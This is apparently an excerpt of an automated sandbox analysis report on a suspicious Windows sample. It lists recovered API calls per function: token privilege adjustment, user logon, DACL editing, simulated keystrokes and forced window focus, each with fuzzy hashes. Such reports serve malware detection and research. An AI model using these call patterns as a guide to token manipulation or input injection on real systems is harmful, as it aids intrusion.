                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LongNamePath_wcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 541455249-0
                                                                                                            • Opcode ID: d9003afb05728363fb71779ef0ee2f9bcad7208f54534121467eed94d78b08f5
                                                                                                            • Instruction ID: a42db05dd4348028a679a116ec62e860bf82f766edb5160c0be475366da49145
                                                                                                            • Opcode Fuzzy Hash: d9003afb05728363fb71779ef0ee2f9bcad7208f54534121467eed94d78b08f5
                                                                                                            • Instruction Fuzzy Hash: CAE0CD776042245BCB10A6989C06FEA77DDDFC8790F040071FD09D7248E970ED848570
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __fread_nolock
                                                                                                            • String ID:
                                                                                                            • API String ID: 2638373210-0
                                                                                                            • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                                                                            • Instruction ID: 10f17312863b497f78d992f3b99ca17c2c4bb6461cecf8880d658908a2a4b4f0
                                                                                                            • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                                                                            • Instruction Fuzzy Hash: 21E048B06097005FDF395A28A851BB677D5DF49300F14045EF59F83252E5726845866D
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D53837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D53908
                                                                                                              • Part of subcall function 00D5D730: GetInputState.USER32 ref: 00D5D807
                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00D52B6B
                                                                                                              • Part of subcall function 00D530F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00D5314E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                                                            • String ID:
                                                                                                            • API String ID: 3667716007-0
                                                                                                            • Opcode ID: 5972d4b411afd2bc5af6d29be1a2f5734e4f1ae0f7650532fc8265f9342439f2
                                                                                                            • Instruction ID: 49f7eb3e616986a5cb6bcf2df075427b4245747b2adb26cba59610c7da6ba3d4
                                                                                                            • Opcode Fuzzy Hash: 5972d4b411afd2bc5af6d29be1a2f5734e4f1ae0f7650532fc8265f9342439f2
                                                                                                            • Instruction Fuzzy Hash: 4FE0262230034406CE08BB34A8524BDBB59CBE1393F40143EFC56832A3CE204A4E8231
                                                                                                            APIs
                                                                                                            • GetFileAttributesW.KERNELBASE(?), ref: 015D661B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1734196376.00000000015D5000.00000040.00000020.00020000.00000000.sdmp, Offset: 015D5000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_15d5000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AttributesFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 3188754299-0
                                                                                                            • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                            • Instruction ID: 9846707a577547420ff4344f5a456e0bfd842a486909b09b3cbfba68a79da4f8
                                                                                                            • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                            • Instruction Fuzzy Hash: BDE08C70A05208EBDB30DAAC8904AAD77A8E708320F044A55F906CB2C0D6318A42D714
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNELBASE(00000000,00000000,?,00D90704,?,?,00000000,?,00D90704,00000000,0000000C), ref: 00D903B7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: 26122b664a7e1301ecfd0b1f815a34204bbf59df4bb136a4a4da3a14e7d56e1c
                                                                                                            • Instruction ID: a326c52ad3ced0588518ae536cb9f675c26f39591cc826e2e82d15604e9b9f23
                                                                                                            • Opcode Fuzzy Hash: 26122b664a7e1301ecfd0b1f815a34204bbf59df4bb136a4a4da3a14e7d56e1c
                                                                                                            • Instruction Fuzzy Hash: 3FD06C3205024DBBDF029F84DD46EDA3FAAFB48714F014000BE1896120C732E822AB91
                                                                                                            APIs
                                                                                                            • GetFileAttributesW.KERNELBASE(?), ref: 015D65EB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1734196376.00000000015D5000.00000040.00000020.00020000.00000000.sdmp, Offset: 015D5000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_15d5000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AttributesFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 3188754299-0
                                                                                                            • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                            • Instruction ID: e6e05bcffee9adb0ba098b5402648b8c2730e21b3ef34e606cab30ac578c1965
                                                                                                            • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                            • Instruction Fuzzy Hash: A4D0A73090520CEBCB20CFBC9C049DE77A8E704320F004764FD15C7280D53199819750
                                                                                                            APIs
                                                                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00D51CBC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InfoParametersSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 3098949447-0
                                                                                                            • Opcode ID: 6ef533a1df696cdfeb7576bbe35382d556af314627c2f217335c4da32605a63c
                                                                                                            • Instruction ID: 442eaedb3cd5e6c96b29dfe15a39ab6a766f8e4019b180536a8ba57aa27211c6
                                                                                                            • Opcode Fuzzy Hash: 6ef533a1df696cdfeb7576bbe35382d556af314627c2f217335c4da32605a63c
                                                                                                            • Instruction Fuzzy Hash: 91C09B352C0344BFF2249781BC4AF107755B35CB00F048001F709B95E3C3A11415D651
                                                                                                            APIs
                                                                                                            • Sleep.KERNELBASE(000001F4), ref: 015D7FE1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1734196376.00000000015D5000.00000040.00000020.00020000.00000000.sdmp, Offset: 015D5000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_15d5000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Sleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 3472027048-0
                                                                                                            • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                            • Instruction ID: e990d25f4771e2a047c4fa714f459ea02928138e4cd05556bbbddb2d57169f83
                                                                                                            • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                            • Instruction Fuzzy Hash: F6E09A7494410EAFDB10EFA8D94969E7BB4EF04301F1005A1FD1596681DB309A548A62
                                                                                                            APIs
                                                                                                            • Sleep.KERNELBASE(000001F4), ref: 015D7FE1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1734196376.00000000015D5000.00000040.00000020.00020000.00000000.sdmp, Offset: 015D5000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_15d5000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Sleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 3472027048-0
                                                                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                            • Instruction ID: 3b66747ff4c853da9d19ba1006affe05439a7ac8043f916e02df7851726197be
                                                                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                            • Instruction Fuzzy Hash: 77E0BF7494410E9FDB10EFA8D94969E7BB4EF04301F1001A1FD1192281DA3099508A62
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D69BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D69BB2
                                                                                                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00DE961A
                                                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00DE965B
                                                                                                            • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00DE969F
                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00DE96C9
                                                                                                            • SendMessageW.USER32 ref: 00DE96F2
                                                                                                            • GetKeyState.USER32(00000011), ref: 00DE978B
                                                                                                            • GetKeyState.USER32(00000009), ref: 00DE9798
                                                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00DE97AE
                                                                                                            • GetKeyState.USER32(00000010), ref: 00DE97B8
                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00DE97E9
                                                                                                            • SendMessageW.USER32 ref: 00DE9810
                                                                                                            • SendMessageW.USER32(?,00001030,?,00DE7E95), ref: 00DE9918
                                                                                                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00DE992E
                                                                                                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00DE9941
                                                                                                            • SetCapture.USER32(?), ref: 00DE994A
                                                                                                            • ClientToScreen.USER32(?,?), ref: 00DE99AF
                                                                                                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00DE99BC
                                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00DE99D6
                                                                                                            • ReleaseCapture.USER32 ref: 00DE99E1
                                                                                                            • GetCursorPos.USER32(?), ref: 00DE9A19
                                                                                                            • ScreenToClient.USER32(?,?), ref: 00DE9A26
                                                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 00DE9A80
                                                                                                            • SendMessageW.USER32 ref: 00DE9AAE
                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00DE9AEB
                                                                                                            • SendMessageW.USER32 ref: 00DE9B1A
                                                                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00DE9B3B
                                                                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00DE9B4A
                                                                                                            • GetCursorPos.USER32(?), ref: 00DE9B68
                                                                                                            • ScreenToClient.USER32(?,?), ref: 00DE9B75
                                                                                                            • GetParent.USER32(?), ref: 00DE9B93
                                                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 00DE9BFA
                                                                                                            • SendMessageW.USER32 ref: 00DE9C2B
                                                                                                            • ClientToScreen.USER32(?,?), ref: 00DE9C84
                                                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00DE9CB4
                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00DE9CDE
                                                                                                            • SendMessageW.USER32 ref: 00DE9D01
                                                                                                            • ClientToScreen.USER32(?,?), ref: 00DE9D4E
                                                                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00DE9D82
                                                                                                              • Part of subcall function 00D69944: GetWindowLongW.USER32(?,000000EB), ref: 00D69952
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00DE9E05
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                                            • String ID: @GUI_DRAGID$F$p#
                                                                                                            • API String ID: 3429851547-638943876
                                                                                                            • Opcode ID: 7bdb9f183a942e9efe0f771d41c286b1ce6d785e2194a878b54afbe6eb663dbb
                                                                                                            • Instruction ID: 87716714d54da776a3b0327df85736831e24a283df19e0a0c01b32bad6e3b33a
                                                                                                            • Opcode Fuzzy Hash: 7bdb9f183a942e9efe0f771d41c286b1ce6d785e2194a878b54afbe6eb663dbb
                                                                                                            • Instruction Fuzzy Hash: A5429D30205380AFDB24EF26CC94AAABBF5FF89310F14061EF999972A1D731D955CB61
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00DE48F3
                                                                                                            • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00DE4908
                                                                                                            • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00DE4927
                                                                                                            • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00DE494B
                                                                                                            • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00DE495C
                                                                                                            • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00DE497B
                                                                                                            • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00DE49AE
                                                                                                            • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00DE49D4
                                                                                                            • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00DE4A0F
                                                                                                            • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00DE4A56
                                                                                                            • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00DE4A7E
                                                                                                            • IsMenu.USER32(?), ref: 00DE4A97
                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00DE4AF2
                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00DE4B20
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00DE4B94
                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00DE4BE3
                                                                                                            • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00DE4C82
                                                                                                            • wsprintfW.USER32 ref: 00DE4CAE
                                                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00DE4CC9
                                                                                                            • GetWindowTextW.USER32(?,00000000,00000001), ref: 00DE4CF1
                                                                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00DE4D13
                                                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00DE4D33
                                                                                                            • GetWindowTextW.USER32(?,00000000,00000001), ref: 00DE4D5A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                                                            • String ID: %d/%02d/%02d
                                                                                                            • API String ID: 4054740463-328681919
                                                                                                            • Opcode ID: 790532157523c29b6c4fddc23fa224ebf540613c552aa5192070576a0d68d0ba
                                                                                                            • Instruction ID: dc319e1f0842475936d3279755464b5e2845256ff44f7857a8c10a814663dc46
                                                                                                            • Opcode Fuzzy Hash: 790532157523c29b6c4fddc23fa224ebf540613c552aa5192070576a0d68d0ba
                                                                                                            • Instruction Fuzzy Hash: 4C12D071900394ABEB24AF26CC49FAE7BB8EF45710F144129F919EB2A1D774D941CB70
                                                                                                            APIs
                                                                                                            • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00D6F998
                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DAF474
                                                                                                            • IsIconic.USER32(00000000), ref: 00DAF47D
                                                                                                            • ShowWindow.USER32(00000000,00000009), ref: 00DAF48A
                                                                                                            • SetForegroundWindow.USER32(00000000), ref: 00DAF494
                                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00DAF4AA
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00DAF4B1
                                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00DAF4BD
                                                                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 00DAF4CE
                                                                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 00DAF4D6
                                                                                                            • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00DAF4DE
                                                                                                            • SetForegroundWindow.USER32(00000000), ref: 00DAF4E1
                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DAF4F6
                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 00DAF501
                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DAF50B
                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 00DAF510
                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DAF519
                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 00DAF51E
                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DAF528
                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 00DAF52D
                                                                                                            • SetForegroundWindow.USER32(00000000), ref: 00DAF530
                                                                                                            • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00DAF557
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                            • String ID: Shell_TrayWnd
                                                                                                            • API String ID: 4125248594-2988720461
                                                                                                            • Opcode ID: 6649f9a0adac1d50b25b837961453af95bda537a28beb8026e8b91b761a96588
                                                                                                            • Instruction ID: b29e925e2dd0e05db389fca4a4dc76015d82ce7ba318cafd1244e038f513e95e
                                                                                                            • Opcode Fuzzy Hash: 6649f9a0adac1d50b25b837961453af95bda537a28beb8026e8b91b761a96588
                                                                                                            • Instruction Fuzzy Hash: 26315271A503587FEB206BF59C89FBF7E6DEB45B50F141065FA00EA2D1C6B09D01AA70
                                                                                                            APIs
                                                                                                              • Part of subcall function 00DB16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00DB170D
                                                                                                              • Part of subcall function 00DB16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00DB173A
                                                                                                              • Part of subcall function 00DB16C3: GetLastError.KERNEL32 ref: 00DB174A
                                                                                                            • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00DB1286
                                                                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00DB12A8
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00DB12B9
                                                                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00DB12D1
                                                                                                            • GetProcessWindowStation.USER32 ref: 00DB12EA
                                                                                                            • SetProcessWindowStation.USER32(00000000), ref: 00DB12F4
                                                                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00DB1310
                                                                                                              • Part of subcall function 00DB10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00DB11FC), ref: 00DB10D4
                                                                                                              • Part of subcall function 00DB10BF: CloseHandle.KERNEL32(?,?,00DB11FC), ref: 00DB10E9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                            • String ID: $default$winsta0$Z
                                                                                                            • API String ID: 22674027-1808616255
                                                                                                            • Opcode ID: ca981c0159851708263bb7a61c7d470235c7c8937e834febb3af90bfe20e6164
                                                                                                            • Instruction ID: 7910502f362bb2076011e0700e9cc54e2d1c6bcfd83ec0a22764dcfbe4bb315a
                                                                                                            • Opcode Fuzzy Hash: ca981c0159851708263bb7a61c7d470235c7c8937e834febb3af90bfe20e6164
                                                                                                            • Instruction Fuzzy Hash: AC818A75900349EBDF21AFA4DC99BEE7BB9EF04704F584129F912E62A0DB318945CB30
                                                                                                            APIs
                                                                                                              • Part of subcall function 00DB10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00DB1114
                                                                                                              • Part of subcall function 00DB10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00DB0B9B,?,?,?), ref: 00DB1120
                                                                                                              • Part of subcall function 00DB10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00DB0B9B,?,?,?), ref: 00DB112F
                                                                                                              • Part of subcall function 00DB10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00DB0B9B,?,?,?), ref: 00DB1136
                                                                                                              • Part of subcall function 00DB10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00DB114D
                                                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00DB0BCC
                                                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00DB0C00
                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00DB0C17
                                                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 00DB0C51
                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00DB0C6D
                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00DB0C84
                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00DB0C8C
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00DB0C93
                                                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00DB0CB4
                                                                                                            • CopySid.ADVAPI32(00000000), ref: 00DB0CBB
                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00DB0CEA
                                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00DB0D0C
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00DB0D1E
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DB0D45
• HeapFree.KERNEL32(00000000), ref: 00DB0D4C
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DB0D55
• HeapFree.KERNEL32(00000000), ref: 00DB0D5C
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DB0D65
• HeapFree.KERNEL32(00000000), ref: 00DB0D6C
• GetProcessHeap.KERNEL32(00000000,?), ref: 00DB0D78
• HeapFree.KERNEL32(00000000), ref: 00DB0D7F
  • Part of subcall function 00DB1193: GetProcessHeap.KERNEL32(00000008,00DB0BB1,?,00000000,?,00DB0BB1,?), ref: 00DB11A1
  • Part of subcall function 00DB1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00DB0BB1,?), ref: 00DB11A8
  • Part of subcall function 00DB1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00DB0BB1,?), ref: 00DB11B7
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
